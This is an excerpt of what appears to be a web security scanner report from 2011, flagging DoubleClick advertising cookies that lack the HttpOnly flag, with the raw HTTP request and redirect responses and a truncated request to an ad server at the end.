HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/savings-product.html Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 21:49:07 GMT Server: GFE/2.0 Content-Type: text/html
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|2782903/965205/15010,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clk;235229193;58835998;e HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://radioshack.shoplocal.com/radioshack/default.aspx? Set-Cookie: id=c653243310000d9|2782903/965205/15010,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 22:24:01 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/ Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 21:50:26 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel?id=731976&t=2 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://download32.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2770%2C2765%2C2794%2C2792%2C2795%2C2763%2C2764%26type%3Dscript%26ipid%3D18400%26sfid%3D0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1=...[SNIP]...